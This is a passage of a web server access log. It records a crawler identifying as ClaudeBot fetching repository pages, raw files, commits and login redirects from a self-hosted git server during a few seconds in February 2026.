(KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js" [Client 216.73.216.188] [Length 10014] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/status.json" [Client 216.73.216.188] [Length 10968] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/global.json?display=source" [Client 216.73.216.188] [Length 11342] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 11784] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/index.html" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 9828] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/index.html" -[15/Feb/2026:09:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.patch" [Client 216.73.216.188] [Length 2981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.html" [Client 216.73.216.188] [Length 47148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1689] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 12037] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_access.log?display=source" [Client 216.73.216.188] [Length 15059] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 216.73.216.188] [Length 20240] [Gzip 5.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 37225] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/docker-compose.yml" [Client 216.73.216.188] [Length 12587] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py" [Client 216.73.216.188] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" [Client 216.73.216.188] [Length 20433] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 13159] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 216.73.216.188] [Length 20220] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln?display=rendered" [Client 216.73.216.188] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" [Client 216.73.216.188] [Length 21965] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache?display=source" [Client 216.73.216.188] [Length 11134] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 9927] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/nginx.conf" [Client 216.73.216.188] [Length 11939] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig?display=rendered" [Client 216.73.216.188] [Length 11036] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 216.73.216.188] [Length 11108] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain..main" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt/renewal" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 216.73.216.188] [Length 9828] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py?display=source" [Client 216.73.216.188] [Length 16061] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=source" [Client 216.73.216.188] [Length 11727] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 216.73.216.188] [Length 10085] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Ffc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/proxy-host-2_error.log?display=source" [Client 216.73.216.188] [Length 14390] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 959] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html.good2" [Client 216.73.216.188] [Length 14689] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12992] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 7500] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 216.73.216.188] [Length 9838] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html" [Client 216.73.216.188] [Length 57805] [Gzip 10.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 216.73.216.188] [Length 11016] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 216.73.216.188] [Length 10498] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=rendered" [Client 216.73.216.188] [Length 11110] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11838] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=source" [Client 216.73.216.188] [Length 14264] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 11082] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10971] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/Dockerfile?display=source" [Client 216.73.216.188] [Length 11590] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr 